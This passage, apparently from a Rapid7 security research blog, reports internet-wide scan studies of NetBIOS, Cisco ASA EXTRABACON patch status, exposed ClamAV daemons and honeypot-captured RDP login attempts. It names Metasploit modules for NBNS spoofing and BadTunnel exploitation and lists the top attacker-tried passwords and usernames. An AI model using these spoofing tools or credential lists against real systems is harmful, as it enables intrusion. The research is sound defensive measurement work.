","data.netbios_mac":"e5:d8:00:21:10:20","data.netbios_hname":"MYSTORAGE","data.netbios_mac_company":"UNKNOWN","data.netbios_mac_company_name":"UNKNOWN"} {"ip":"192.168.0.2","data.netbios_names":"OFFICE-PC:00:U OFFICE-PC:20:U WORKGROUP:00:G WORKGROUP:1e:G WORKGROUP:1d:U \u0001\u0002__MSBROWSE__\u0002:01:G ","data.netbios_mac":"00:1e:10:1f:8f:ab","data.netbios_hname":"OFFICE-PC","data.netbios_mac_company":"Shenzhen","data.netbios_mac_company_name":"ShenZhen Huawei Communication Technologies Co.,Ltd."} {"ip":"192.168.0.3","data.netbios_names":"DSL_ROUTE:00:U DSL_ROUTE:03:U DSL_ROUTE:20:U \u0001\u0002__MSBROWSE__\u0002:01:G WORKGROUP:1d:U WORKGROUP:1e:G WORKGROUP:00:G ","data.netbios_mac":"00:00:00:00:00:00","data.netbios_hname":"DSL_ROUTE"} There are also several Metasploit modules for exploring/exploiting NBNS in various ways: auxiliary/scanner/netbios/nbname: performs the same initial probe as the Sonar study against one or more targets but uses the NetBIOS name of the target to perform a follow-up query that will disclose the IPv4 address(es) of the target.  Useful in situations where the target is behind NAT, multi-homed, etc., and this information can potentially be used in future attacks or reconaissance. auxiliary/admin/netbios/netbios_spoof: attempts to spoof a given NetBIOS name (such as WPAD) targeted against specific system auxiliary/spoof/nbns/nbns_response: similar to netbios_spoof but listens for all NBNS requests broadcast on the local network and will attempt to spoof all names (or just a subset by way of regular expressions) auxiliary/server/netbios_spoof_nat: used to exploit BadTunnel For a protocol that has been around for over 30 years and has had its fair share of research done against it, one might think that there is no more to be discovered, but the discovery of two high profile vulnerabilities in NBNS this year (HotPotato and BadTunnel) shows that there is absolutely more to be had. If you are curious about NBNS and interested in exploring more, use the data, tools and knowledge provided above.  We'd love to hear your ideas or discoveries either here in the comments or by emailing research@rapid7.com. Enjoy!

Bringing Home The EXTRABACON [Exploit]

by Derek Abdine & Bob Rudis (photo CC-BY-SA Kalle Gustafsson) Astute readers will no doubt remember the Shadow Brokers leak of the Equation Group exploit kits and hacking tools back in mid-August. More recently, security researchers at SilentSignal noted that it was possible to modify…

by Derek Abdine & Bob Rudis (photo CC-BY-SA Kalle Gustafsson) Astute readers will no doubt remember the Shadow Brokers leak of the Equation Group exploit kits and hacking tools back in mid-August. More recently, security researchers at SilentSignal noted that it was possible to modify the EXTRABACON exploit from the initial dump to work on newer Cisco ASA (Adaptive Security Appliance) devices, meaning that virtually all ASA devices (8.x to 9.2(4)) are vulnerable and it may be interesting to dig into the vulnerability a bit more from a different perspective. Now, "vulnerable" is an interesting word to use since: the ASA device must have SNMP enabled and an attacker must have the ability to reach the device via UDP SNMP (yes, SNMP can run over TCP though it's rare to see it working that way) and know the SNMP community string an attacker must also have telnet or SSH access to the devices This generally makes the EXTRABACON attack something that would occur within an organization's network, specifically from a network segment that has SNMP and telnet/SSH access to a vulnerable device. So, the world is not ending, the internet is not broken and even if an attacker had the necessary access, they are just as likely to crash a Cisco ASA device as they are to gain command-line access to one by using the exploit. Even though there's a high probable loss magnitude1 from a successful exploit, the threat capability2 and threat event frequency3 for attacks would most likely be low in the vast majority of organizations that use these devices to secure their environments. Having said that, EXTRABACON is a pretty critical vulnerability in a core network security infrastructure device and Cisco patches are generally quick and safe to deploy, so it would be prudent for most organizations to deploy the patch as soon as they can obtain and test it. Cisco did an admirable job responding to the exploit release and has a patch ready for organizations to deploy. We here at Rapid7 Labs wanted to see if it was possible to both identify externally facing Cisco ASA devices and see how many of those devices were still unpatched. Unfortunately, most firewalls aren't going to have their administrative interfaces hanging off the public internet nor are they likely to have telnet, SSH or SNMP enabled from the internet. So, we set our sights on using Project Sonar to identify ASA devices with SSL/IPsec VPN services enabled since: users generally access corporate VPNs over the internet (so we will be able to see them) many organizations deploy SSL VPNs these days versus or in addition to IPsec (or other) VPNs (and, we capture all SSL sites on the internet via Project Sonar) these SSL VPN-enabled Cisco ASAs are easily identified We found over 50,000 Cisco ASA SSL VPN devices in our most recent SSL scan.Keeping with the spirit of our recent National Exposure research, here's a breakdown of the top 20 countries: Table 1: Device Counts by Country Country Device count % United States 25,644 50.9% Germany 3,115 6.2% United Kingdom 2,597 5.2% Canada 1,994 4.0% Japan 1,774 3.5% Netherlands 1,310 2.6% Sweden 1,095 2.2% Australia 1,083 2.2% Denmark 1,026 2.0% Italy 991 2.0% Russian Federation 834 1.7% France 777 1.5% Switzerland 603 1.2% China 535 1.1% Austria 497 1.0% Norway 448 0.9% Poland 410 0.8% Finland 404 0.8% Czech Republic 396 0.8% Spain 289 0.6% Because these are SSL VPN devices, we also have access to the certificates that organizations used to ensure confidentiality and integrity of the communications. Most organizations have one or two (higher availability) VPN devices deployed, but many must deploy significantly more devices for geographic coverage or capacity needs: Table 2: List of organizations with ten or more VPN ASA devices Organization Count Large Japanese telecom provider 55 Large U.S. multinational technology company 23 Large U.S. health care provider 20 Large Vietnamese financial services company 18 Large Global utilities service provider 18 Large U.K. financial services company 16 Large Canadian university 16 Large Global talent management service provider 15 Large Global consulting company 14 Large French multinational manufacturer 13 Large Brazilian telecom provider 12 Large Swedish technology services company 12 Large U.S. database systems provider 11 Large U.S. health insurance provider 11 Large U.K. government agency 10 So What? The above data is somewhat interesting on its own, but what we really wanted to know is how many of these devices had not been patched yet (meaning that they are technically vulnerable if an attacker is in the right network position). Remember, it's unlikely these organizations have telnet, SSH and SNMP enabled to the internet and researchers in most countries, including those of us here in the United States, are not legally allowed to make credentialed scan attempts on these services without permission. Actually testing for SNMP and telnet/SSH access would have let us identify truly vulnerable systems. After some bantering with the extended team (Brent Cook, Tom Sellers & jhart) and testing against a few known devices, we decided to use hping to determine device uptime from timestamps and see how many devices had been rebooted since release of the original exploits on (roughly) August 15, 2016. We modified our Sonar environment to enable hping studies and then ran the uptime scan across the target device IP list on August 26, 2016, so any system with an uptime > 12 days that has not been rebooted (or is employing some serious timestamp masking techniques) is technically vulnerable. Also remember that organizations who thought their shiny new ASA devices weren't vulnerable also became vulnerable after the August 25, 2016 SilentSignal blog post (meaning that if they thought it was reasonable not to patch and reboot it became unreasonable to think that way on August 25). So, how many of these organizations patched & rebooted? Well, nearly 12,000 (~24%) of them prevented us from capturing the timestamps. Of the remaining ones, here's how their patch status looks: We can look at the distribution of uptime in a different way with a histogram, making 6-day buckets (so we can more easily see "Day 12"): This also shows the weekly patch/reboot cadence that many organizations employ. Let's go back to our organization list and see what the mean last-reboot time is for them: Table 3: hping Scan results (2016-08-26) Organization Count Mean uptime (days) Large Japanese telecom provider 55 33 Large U.S. multinational technology company 23 27 Large U.S. health care provider 20 47 Large Vietnamese financial services company 18 5 Large Global utilities service provider 18 40 Large U.K. financial services company 16 14 Large Canadian university 16 21 Large Global talent management service provider 15 Unavailable Large Global consulting company 14 21 Large French multinational manufacturer 13 34 Large Brazilian telecom provider 12 23 Large Swedish technology services company 12 4 Large U.S. database systems provider 11 25 Large U.S. health insurance provider 11 Unavailable Large U.K. government agency 10 40 Two had no uptime data available and two had rebooted/likely patched since the original exploit release. Fin We ran the uptime scan after the close of the weekend (organizations may have waited until the weekend to patch/reboot after the latest exploit news) and here's how our list looked: Table 4: hping Scan Results (2016-08-29) Organization Count Mean uptime (days) Large Japanese telecom provider 55 38 Large U.S. multinational technology company 23 31 Large U.S. health care provider 20 2 Large Vietnamese financial services company 18 9 Large Global utilities service provider 18 44 Large U.K. financial services company 16 18 Large Canadian university 16 26 Large Global talent management service provider 15 Unavailable Large Global consulting company 14 25 Large French multinational manufacturer 13 38 Large Brazilian telecom provider 12 28 Large Swedish technology services company 12 8 Large U.S. database systems provider 11 26 Large U.S. health insurance provider 11 Unavailable Large U.K. government agency 10 39 Only one additional organization (highlighted) from our "top" list rebooted (likely patched) since the previous scan, but an additional 4,667 devices from the full data set were rebooted (likely patched). This bird's eye view of how organizations have reacted to the initial and updated EXTRABACON exploit releases shows that some appear to have assessed the issue as serious enough to react quickly while others have moved a bit more cautiously. It's important to stress, once again, that attackers need to have far more than external SSL access to exploit these systems. However, also note that the vulnerability is very real and impacts a wide array of Cisco devices beyond these SSL VPNs. So, while you may have assessed this as a low risk, it should not be forgotten and you may want to ensure you have the most up-to-date inventory of what Cisco ASA devices you are using, where they are located and the security configurations on the network segments with access to them. We just looked for a small, externally visible fraction of these devices and found that only 38% of them have likely been patched. We're eager to hear how organizations assessed this vulnerability disclosure in order to make the update/no update decision. So, if you're brave, drop a note in the comments or feel free to send a note to research@rapid7.com (all replies to that e-mail will be kept confidential). 1,2,3 Open FAIR Risk Taxonomy [PDF]

Digging for Clam[AV]s with Project Sonar

A little over a week ago some keen-eyed folks discovered a feature/configuration weakness in the popular ClamAV malware scanner that makes it possible to issue administrative commands such as SCAN or SHUTDOWN remotely—and without authentication—if the daemon happens to be running on…

A little over a week ago some keen-eyed folks discovered a feature/configuration weakness in the popular ClamAV malware scanner that makes it possible to issue administrative commands such as SCAN or SHUTDOWN remotely—and without authentication—if the daemon happens to be running on an accessible TCP port. Shortly thereafter, Robert Graham unholstered his masscan tool and did a summary blog post on the extent of the issue on the public internet. The ClamAV team (which is a part of Cisco) did post a response, but the reality is that if you're running ClamAV on a server on the internet and misconfigured it to be listening on a public interface, you're susceptible to a trivial application denial of service attack and potentially susceptible to a file system enumeration attack since anyone can try virtually every conceivable path combination and see if they get a response. Given that it has been some time since the initial revelation and discovery, we thought we'd add this as a regular scan study to Project Sonar to track the extent of the vulnerability and the cleanup progress (if any). Our first study run was completed and the following are some of the initial findings. Our study found 1,654,211 nodes responding on TCP port 3310. As we pointed out in our recent National Exposure research (and as Graham noted in his post) a great deal of this is "noise". Large swaths of IP space are configured to respond "yes" to "are you there" queries to, amongst other things, thwart scanners. However, we only used the initial, lightweight "are you there" query to determine targets for subsequent full connections and ClamAV VERSION checks. We picked up many other types of servers running on TCP pot 3310, including nearly: 16,000 squid proxy servers 600 nginx servers (20,000 HTTP servers in all) 500 database servers 600 SSH servers But, you came here to learn about the ClamAV servers, so let's dig in. Clam Hunting We found 5,947 systems responding with a proper ClamAV response header to the VERSION query we submitted. Only having around 6,000 exposed nodes out of over 350 million PINGable nodes is nothing to get really alarmed about. This is still an egregious configuration error, however, and if you have this daemon exposed in this same way on your internal network it's a nice target for attackers that make their way past your initial defenses. 5,947 is a small enough number that we can easily poke around at the data a bit to see if we can find any similarities or learn any lessons. Let's take a look at the distribution of the ClamAV versions: You can click on that chart to look at the details, but it's primarily there to show that virtually every ClamAV release version is accounted for in the study, with some dating back to 2004/2005. If we zoom in on the last part of the chart, we can see that almost half (2,528) of the exposed ClamAV servers are running version 0.97.5, which itself dates back to 2012. While I respect Graham's guess that these may have been unmaintained or forgotten appliances, there didn't seem to be any real pattern to them as we looked at DNS PTR records and other host metadata we collected. These all do appear to have been just "set and forgot" installs, reinforcing our findings in the National Exposure report that there are virtually no barriers to entry for standing up or maintaining nodes on the internet. A Banner Haul Now, not all VERSION queries respond with complete banner information but over half did and said response banner contains both the version string and the last time the scanner had a signature update. Despite the poor network configuration of the nodes, 2,930 (49.3%) of them were at least current with their signatures, but 346 of them weren't, with a handful being over a decade out of "compliance." We here at Rapid7 strive to stay within the rules, so we didn't poke any deeper to try to find out the signature (or further vulnerability) status of the other ClamAV nodes. As we noted above, we performed post-scan DNS PTR queries and WHOIS queries for these nodes, but this exercise proved to be less than illuminating. These are nodes of all shapes and sizes sitting across many networks and hosting providers. There did seem to be a large commonality of these ClamAV systems running on hosts in "mom and pop" ISPs and we did see a few at businesses and educational institutions, but overall these are fairly random and probably (in some cases) even accidental ClamAV deployments. As a last exercise, we grouped the ClamAV nodes by autonomous system (AS) and tallied up the results. There was a bit of a signal here that you can clearly see in this list of the "top" 10 ASes: AS AS Name Count % 4766 KIXS-AS-KR Korea Telecom, KR 1,733 29.1% 16276 OVH, FR 513 8.6% 3786 LGDACOM LG DACOM Corporation, KR 316 5.3% 25394 MK-NETZDIENSTE-AS, DE 282 4.7% 35053 PHADE-AS, DE 263 4.4% 11994 CZIO-ASN - Cruzio, US 251 4.2% 41541 SWEB-AS Serveisweb, ES 175 2.9% 9318 HANARO-AS Hanaro Telecom Inc., KR 147 2.5% 23982 SENDB-AS-KR Dongbu District Office of Education in Seoul, KR 104 1.7% 24940 HETZNER-AS, DE 65 1.1% Over 40% of these systems are on networks within the Republic of Korea. If we group those by country instead of AS, this "geographical" signal becomes a bit stronger: Country Count % 1 Korea, Republic of 2,463 41.4% 2 Germany 830 14.0% 3 United States 659 11.1% 4 France 512 8.6% 5 Spain 216 3.6% 6 Italy 171 2.9% 7 United Kingdom 99 1.7% 8 Russian Federation 78 1.3% 9 Japan 67 1.1% 10 Brazil 62 1.0% What are some takeaways from these findings? Since there was a partial correlation to exposed ClamAV nodes being hosted in smaller ISPs it might be handy if ISPs in general offered a free or very inexpensive "hygiene check" service which could provide critical information in understandable language for less tech-savvy server owners. While this exposure is small, it does illustrate the need for implementing a robust configuration management strategy, especially for nodes that will be on the public internet. We have tools that can really help with this, but adopting solid DevOps principles with a security mindset is a free, proactive means of helping to ensure you aren't deploying toxic nodes on the internet. Patching and upgrading go hand-in-hand with configuration management and it's pretty clear almost 6,000 sites have not made this a priority. In their defense, many of these folks probably don't even know they are running ClamAV servers on the internet. Don't forget your security technologies when dealing with configuration and patch management. We cyber practitioners spend a great deal of time pontificating about the need for these processes but often times do not heed our own advice. Turn stuff off. It's unlikely the handfuls of extremely old ClamAV nodes are serving any purpose, besides being easy marks for attackers. They're consuming precious IPv4 space along with physical data center resources that they just don't need to be consuming. Don't assume that if your ClamAV (or any server software, really) is "just internal" that it's not susceptible to attack. Be wary of leaving egregiously open services like this available on any network node, internally or externally. Fin Many thanks to Jon Hart, Paul Deardorff & Derek Abdine for their engineering expertise on Project Sonar in support of this new study. We'll be keeping track of these ClamAV deployments and hopefully seeing far fewer of them as time goes on. Drop us a note at research@rapid7.com or post a comment here if you have any questions about this or future studies.

Rapid7 Releases New Research: The National Exposure Index

Today, I'm happy to announce the latest research paper from Rapid7, National Exposure Index: Inferring Internet Security Posture by Country through Port Scanning, by Bob Rudis, Jon Hart, and me, Tod Beardsley. This research takes a look at one of the most foundational components of…

Today, I'm happy to announce the latest research paper from Rapid7, National Exposure Index: Inferring Internet Security Posture by Country through Port Scanning, by Bob Rudis, Jon Hart, and me, Tod Beardsley. This research takes a look at one of the most foundational components of the internet: the millions and millions of individual services that live on the public IP network. When people think about "the internet," they tend to think only of the one or two protocols that the World Wide Web runs on, HTTP and HTTPS. Of course, there are loads of other services, but which are actually in use, and at what rate? How much telnet, SSH, FTP, SMTP, or any of the other protocols that run on TCP/IP is actually in use today, where are they all located, and how much of it is inherently insecure due to running over non-encrypted, cleartext channels? While projects like CAIDA and Shodan perform ongoing telemetry that covers important aspects of the internet, we here at Rapid7 are unaware of any ongoing effort to gauge the general deployment of services on public networks. So, we built our own, using Project Sonar, and we have the tooling now to not only answer these fundamental questions about the nature of the internet and come up with more precise questions for specific lines of inquiry. Can you name the top ten TCP protocols offered on the internet? You probably can guess the top two, but did you know that #7 is telnet? Yep, there are 15 million good old, reliable, usually unencrypted telnet out there, offering shells to anyone who cares to peek in on the cleartext password as it's being used. We found some weird things on the national level, too. For instance, about 75% of the servers offering SMB/CIFS services - a (usually) Microsoft service for file sharing and remote administration for Windows machines -  reside in just six countries: the United States, China, Hong Kong, Belgium, Australia and Poland. It's facts like these that made us realize that we have a fundamental gap in our awareness of the services deployed on the public side of firewalls the world over. This gap, in turn, makes it hard to truly understand what the internet is. So, the paper and the associated data we collected (and will continue to collect) can help us all get an understanding of what makes up one of the most significant technologies in use on Planet Earth. So, you can score a copy of the paper, full of exciting graphs (and absolutely zero pie charts!) here. Or, if you're of a mind to dig into the data behind those graphs, you can score the summary data here and let us know what is lurking in there that you found surprising, shocking, or sobering.

The Attacker's Dictionary

Rapid7 is publishing a report about the passwords attackers use when they scan the internet indiscriminately. You can pick up a copy at booth #4215 at the RSA Conference this week, or online right here. The following post describes some of what is investigated in…

Rapid7 is publishing a report about the passwords attackers use when they scan the internet indiscriminately. You can pick up a copy at booth #4215 at the RSA Conference this week, or online right here. The following post describes some of what is investigated in the report. Announcing the Attacker's Dictionary Rapid7's Project Sonar periodically scans the internet across a variety of ports and protocols, allowing us to study the global exposure to common vulnerabilities as well as trends in software deployment (this analysis of binary executables stems from Project Sonar). As a complement to Project Sonar, we run another project called Heisenberg which listens for scanning activity. Whereas Project Sonar sends out lots of packets to discover what is running on devices connected to the Internet, Project Heisenberg listens for and records the packets being sent by Project Sonar and other Internet-wide scanning projects. The datasets collected by Project Heisenberg let us study what other people are trying to examine or exploit. Of particular interest are scanning projects which attempt to use credentials to log into services that we do not provide. We cannot say for sure what the intention is of a device attempting to log into a nonexistent RDP server running on an IP address which has never advertised its presence, but we believe that behavior is suspect and worth analyzing. How Project Heisenberg Works Project Heisenberg is a collection of low interaction honeypots deployed around the world. The honeypots run on IP addresses which we have not published, and we expect that the only traffic directed to the honeypots would come from projects or services scanning a wide range of IP addresses. When an unsolicited connection attempt is made to one of our honeypots, we store all the data sent to the honeypot in a central location for further analysis. In this post we will explore some of the data we have collected related to Remote Desktop Prodocol (RDP) login attempts. RDP Summary Data We have collected RDP passwords over a 334 day period, from 2015-03-12 to 2016-02-09. During that time we have recorded 221203 different attempts to log in, coming from 5076 distinct IP addresses across 119 different countries, using 1806 different usernames and 3969 different passwords. Because it wouldn't be a discussion of passwords without a top 10 list, the top 10 passwords that we collected are: password count percent x 11865 5.36% Zz 10591 4.79% St@rt123 8014 3.62% 1 5679 2.57% P@ssw0rd 5630 2.55% bl4ck4ndwhite 5128 2.32% admin 4810 2.17% alex 4032 1.82% ....... 2672 1.21% administrator 2243 1.01% And because we have information not only about passwords, but also about the usernames that are being used, here are the top 10 that were collected: username count percent administrator 77125 34.87% Administrator 53427 24.15% user1 8575 3.88% admin 4935 2.23% alex 4051 1.83% pos 2321 1.05% demo 1920 0.87% db2admin 1654 0.75% Admin 1378 0.62% sql 1354 0.61% We see on average 662.28 login attempts every day, but the actual daily number varies quite a bit. The chart below shows the number of events per day since we started collecting data. Notice the heavy activity in the first four months, which skews the average high. In addition to the username and password being used in the login attempts that we captured, we also collected the IP address of the device making the login attempt. To the best of the ability of the GeoIP database we used, here are the top 15 countries from which the collected login attempts originate: country country code count percent China CN 88227 39.89% United States US 54977 24.85% South Korea KR 13182 5.96% Netherlands NL 10808 4.89% Vietnam VN 6565 2.97% United Kingdom GB 3983 1.80% Taiwan TW 3808 1.72% France FR 3709 1.68% Germany DE 2488 1.12% Canada CA 2349 1.06% With the data broken down by country, we can recreate the chart above to show activity by country for the top 5 countries: RDP Highlights There is even more information to be found in this data beyond counting passwords, usernames and countries. We guess that these passwords are selected because whomever is conducting these scans believes that there is a chance they will work. Maybe the scanners have inside knowledge about actual usernames and passwords in use, or maybe they're just using passwords that have been made available from previous security breaches in which account credentials were leaked. In order to look into this, we compared all the passwords collected by Project Heisenberg to passwords listed in two different collections of leaked passwords. The first is a list of passwords collected from leaked password databases by Crackstation. The second list comes from Mark Burnett. In the table below we list how many of the top N passwords are found in these password lists: top password count num in any list percent 1 1 100.00% 2 2 100.00% 3 2 66.67% 4 3 75.00% 5 4 80.00% 10 8 80.00% 50 28 56.00% 100 55 55.00% 1000 430 43.00% 3969 1782 44.90% This means that 8 of the 10 most frequently used passwords were also found in published lists of leaked passwords. But looking back at the top 10 passwords above, they are not very complex and so it is not surprising that they appear in a list of leaked passwords. This observation prompted us to look at the complexity of the passwords we collected. Just about any time you sign up for a service on the internet – be it a social networking site, an online bank, or a music streaming service – you will be asked to provide a username and password. Many times your chosen password will be evaluated during the signup process and you will be given feedback about how suitable or secure it is. Password evaluation is a tricky and inexact art that consists of various components. Some of the many aspects that a password evaluator may take into consideration include: length presence of dictionary words runs of characters (aaabbbcddddd) presence of non alphanumeric characters (!@#$%^&*) common substitutions (1 for l [lowercase L], 0 for O [uppercase o]) Different password evaluators will place different values on each of these (and other) characteristics to decide whether a password is "good" or "strong" or "secure". We looked at a few of these password evaluators, and found zxcvbn to be well documented and maintained, so we ran all the passwords through it to compute a complexity score for each one. We then looked at how password complexity is related to finding a password in a list of leaked passwords. complexity # passwords % crackstation crackstation % Burnnet Burnett % any any % all all % 0 803 20.23 726 90.41 564 70.24 728 90.66 562 69.99 1 1512 38.10 898 59.39 634 41.93 939 62.10 593 39.22 2 735 18.52 87 11.84 37 5.03 94 12.79 30 4.08 3 567 14.29 13 2.29 5 0.88 13 2.29 5 0.88 4 352 8.87 7 1.99 4 1.14 8 2.27 3 0.85 The above table shows the complexity of the collected passwords, as well as how many were found in different password lists. For instance, with complexity level 4, there were 352 passwords classified as being that complex, 7 of which were found in the crackstation list, and 4 of which were found in the Burnett list. Furthermore, 8 of the passwords were found in at least one of the password lists, meaning that if you had all the password lists, you would find 2.27% of the passwords classified as having a complexity value of 4. Similarly, looking across all the password lists, you would find 3 (0.85%) passwords present in each of the lists. From this we extrapolate that as passwords get more complex, fewer and fewer are found in the lists of leaked passwords. Since we see that attackers try passwords that are stupendously simple, like single character passwords, and much more complex passwords that are typically not found in the usual password lists, we can surmise that these attackers are not tied to these lists in any practical way -- they clearly have other sources for likely credentials to try. Finally, we wanted to know what the population of possible targets looks like. How many endpoints on the internet have an RDP server running, waiting for connections? Since we have experience from Project Sonar, on 2016-02-02 the Rapid7 Labs team ran a Sonar scan to see how many IPs have port 3389 open listening for tcp traffic. We found that 10822679 different IP addresses meet that criteria, spread out all over the world. So What? With this dataset we can learn about how people looking to log into RDP servers operate. We have much more detail in the report, but some our findings include: We see that many times a day, every day, our honeypots are contacted by a variety of entities. We see that many of these entities try to log into an RDP service which is not there, using a variety of credentials. We see that a majority of the login attempts use simple passwords, most of which are present in collections of leaked passwords. We see that as passwords get more complex, they are less and less likely to be present in collections of leaked passwords. We see that there is a significant population of RDP enabled endpoints connected to the internet. But wait, there's more! If this interests you and you would like to learn more, come talk to us at booth #4215 the RSA Conference.

Featured Research

National Exposure Index 2017

The National Exposure Index is an exploration of data derived from Project Sonar, Rapid7's security research project that gains insights into global exposure to common vulnerabilities through internet-wide surveys.

Learn More

Upcoming Event

UNITED 2017

Rapid7's annual security summit is taking place September 12-14, 2017 in Boston, MA. Join industry peers for candid talks, focused trainings, and roundtable discussions that accelerate innovation, reduce risk, and advance your business.

Register Now

Podcast

Security Nation

Security Nation is a podcast dedicated to covering all things infosec – from what's making headlines to practical tips for organizations looking to improve their own security programs. Host Kyle Flaherty has been knee–deep in the security sector for nearly two decades. At Rapid7 he leads a solutions-focused team with the mission of helping security professionals do their jobs.

Listen Now